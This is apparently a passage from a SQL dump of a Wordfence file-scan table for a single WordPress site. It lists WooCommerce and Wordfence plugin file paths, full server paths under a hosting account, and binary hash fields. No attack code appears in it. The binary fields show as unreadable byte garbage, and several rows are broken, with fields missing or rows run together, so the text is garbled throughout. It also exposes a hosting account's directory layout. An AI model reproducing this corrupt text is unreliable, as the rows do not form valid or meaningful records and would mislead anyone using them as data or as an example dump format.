F%','wp-content/plugins/woocommerce/vendor/symfony/css-selector/XPath/Translator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/symfony/css-selector/XPath/Translator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!%L.R5}%','^f\'c5a4OKȺ','',0,'?'),('*(*+Wjcp','wp-content/plugins/wordfence/crypto/vendor/autoload.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Կ:V U\'','|RaS@-','u{4sJ3H6owr','',0,'?'),('kPP1<','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oul_4@','6b% \"ʴsJp38ӷSǙ:','',0,'?'),('MAH\0[d_!','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5,}vĨ3G)','Er4@\0ԡ$z3$l\Z`iexl','',0,'?'),('8YvC[,','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\0>}LQ\0','_U\0]q=Չf\\/ @d\r+v*(','',0,'?'),('Zp%\'n\ZWj','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' o@3e]@\"','FE(ۛ6Dd7ABG̠U*','',0,'?'),('PK2I )','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y w5(nbm','m!`~:-\n&3@N[9d\r','',0,'?'),('&PDt?5u1Ym','wp-content/plugins/wordfence/crypto/vendor/composer/installed.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xy~XC','B :zʉ̂DPڒl\Z-|','',0,'?'),('˕r&qFi','wp-content/plugins/wordfence/crypto/vendor/composer/installed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/composer/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!yWU[u3FQ','ķ͞&FIfYG0','',0,'?'),('^uuWdM=','wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z=Eo0[','m?\Z\"g=0N\"Q`u\'~I','',0,'?'),('N\'!\rBj3','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\H!#>bW','&xwαh)œ@5m.)9R','',0,'?'),('F| wZQ,O','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6?\n :›{Q%','ZIK/Iw¥OvyE Bi\\$G&','',0,'?'),('O4dzWQ\0R','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Lj\"Cix',' x眪!}\ZWd','',0,'?'),('.U Y=','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h`VAf','<\\G;1#kLà(փ','',0,'?'),('>GOjPlB','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$]\\ ','ؚx\"o*I\nQjT(G\Z.\Z','',0,'?'),('1-g97','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#fG\rւBg 0','c(k12Qw4 ?0','',0,'?'),('461mYR','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4tQSDv','t!BxV\\N< tp!SEг','',0,'?'),('\rX+-Ta','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' O>A+=\Z,','UsDMÙ d(\0ā~','',0,'?'),(' vbu)','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Y@_x','ް\Z^3ɟvU.a\r]fhI(sA','',0,'?'),('PJt1z','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!EP]ǡ;','<\0\rIB=\"P8D\"L~I[','',0,'?'),('wË9 /,+1','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g۰/*C,k#','av xu흶j=ISD{!','',0,'?'),('YV29}D8','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CZ?@JN_ji<\Z','','',0,'?'),('- 췓9ExZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XwTgA}\n','kcQxe˳`=n6X5ydz5u]WB\'','',0,'?'),('yKv.\Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>_3Nw #','ǥmZz*,=:\n-3|!','',0,'?'),('?HhD0 ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(j[}B yVyKR',',4AX$ssyEmPY<','',0,'?'),('*h^','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'crϙDq5\'G~','H.#\nDu9uq,Ea%og','',0,'?'),('\n:X2Lnc','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SɛmE}Zh','-y.=U6\n68h&9#','',0,'?'),('KSEōL3','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/stream-xchacha20.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/stream-xchacha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V=r@ٸ~kt','|J\0R]-23zTH?U','',0,'?'),('Z(|Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QUp~ocÊ4Nt','Lnl2@ΐ>hi,uJYH\\L,B','',0,'?'),('ν}V+tB','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','꤀x٠%cl','N8,caeΟi<5p$','',0,'?'),('!Id]5$[~','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o L k\'k1','1\\Qt*J%s&','',0,'?'),('\'|? >','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LaDJ?Z','=F==<_%=M?u/','',0,'?'),('IPEXtFH%','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Lv[c)?','Ch!݀F$}wd7b(!pIF.L','',0,'?'),('W= \\\'x\"W}d','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','թK^㥾','M8:naƋGZqQdý!\'&g1','',0,'?'),('ZяݒS','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l\Z^ZHG%O','mc;\ny㐲0,5F|=C','',0,'?'),(',zeY #uJ~[P\r','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Op R{ҵGݍ','Y:BP5Ms_ .ن֎','',0,'?'),('BKAaVDR2','rћJԑI/\nOY}xņU ','',0,'?'),('bq/Fk','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7¤\rF g','nV\'VV)F|*ᑝ 2Nz','',0,'?'),('^Sx_?uGD','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hd9$KHT','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?G{g','ĀР\n','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f<_2S^IZ','iݯ8{iq!dՍAz','',0,'?'),('YBWy +BOmz','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#:N\'DxN','[_|А~E+~E(`_','',0,'?'),('KLxڂB','',0,'?'),('F1+\Z#+d{w{','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.D6pir`fw=','2KJ73x2M2&+LL','',0,'?'),('ESc+#)','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uNmSC{',' P~{p}x{82hXx','',0,'?'),('!Plu6CZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pe1','T*+z]ʜ;>\n3]?x','',0,'?'),('ia{-\Zؙo','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}<܎s9','Q\'r t7=s*a`#Q\0','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}$?i','qn&%G~\\^Ӑ 0','',0,'?'),('xLKx 2Is!#Q','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rUCB\"',')M쩂tUδԪF.','',0,'?'),('%#t4x','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yW0{XnZ0','\0AVRXȕ~d^/)@R','',0,'?'),('P NtD݌n\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yK] ','b}\"ozV(\rV\'QuIv','',0,'?'),('$P`\0gX','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yF“\\2','2ks\\>RI:nHȿDm!zz','',0,'?'),('Z9}.Jk =','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8I\Z\nӣ','i>zR@kW6uky','',0,'?'),('Pbw=i','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\ZIw5AlLۢ','K{8fl7sRh嗋I','',0,'?'),('-\'gP\\','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9V#ҹ4 ','GpfHv\Zx81C[4A','',0,'?'),('AK\\;B!','',0,'?'),('vLM.f%OMR','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Oq+O','5\'R Eһ56dgo','',0,'?'),('͍ρbB','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' :CVFІR',',)|Fa悃f>;J\\','',0,'?'),('oC\"Qty','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+%','4!H:6>lEEc#a{A{','',0,'?'),('*b*ee','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x\\8zM~.','vR\0S~[\rҮ6o:Ś\r]','',0,'?'),('HY6oD{LH','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V~D;[`d','߿\n\"KL\Z6\'5czdw','',0,'?'),('➞^՘R','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ohg[',' ߁.-h4`9S _\r)I(W','',0,'?'),('p@wNj','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ristretto255.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ristretto255.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Us ','ilw\n^E|\" S 沄Bi','',0,'?'),('%$MqT<','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CUO\ZߠxtH ','G\n\"_/Agh U?SsHבYٳ','',0,'?'),('0aOZI|I','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W HY ²','zI]_Dz!bш6duY3','',0,'?'),('̙~Ȍî+byȁ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DŽ簕۹3w','ʣ>yqөf_#QuW\" ^?','',0,'?'),('K0\rܐcn','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rop (90Dz','$$OVf.i{\\O8p3','',0,'?'),('?U\'_l.p','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o>B IN-y','hl[(l~QuFM ','',0,'?'),('gxAȢ}g','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']ኮȣ&','K# @JU}F,![','',0,'?'),(']*.>`Ef','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kF h瀁1-','6!omݎ^.^@˨v7 I}','',0,'?'),('l/\Z\Z+,','*y$MQ[q:h\")XTC\0\\k','',0,'?'),('cYF}j`','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3b(浏К','n;<  Ǖ-Wt]*L1˵\"k%F+','ZiMfUvi-})f\"Mnd?X','',0,'?'),('Xp~0D','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Woe~oB2_;','5qSrL]OXsq+ l<ɒ','',0,'?'),('A?]\\8PMTl','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0ǰ{8}zl','jG~.\'G*\'S3t~ӆ','',0,'?'),('BPXW6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m9N2ų[','=*tzv\'W\nKRlx7','',0,'?'),('[\'/;','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܆)C/կ ٝ','1\'CAUu3iffDtl~','',0,'?'),('a@WrQwZ\n.','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܑzg,mִ','wp-content/plugins/wordfence/css/fullLog.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/fullLog.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e.i`΁Uv','?>?hξ[²Pu{puaa','',0,'?'),('hr\Z;%e-x','wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GJu;QZ6','\\MUKhQwCiVJ\'','',0,'?'),('2v\'9\rz','wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pbD@pG+','*DZ>Bg&YY4(','wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\\c7yxгl','~qV*\'1]3^m','',0,'?'),('2r}Vĥ$^n/','wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h^n=(&݂N&','SDIB 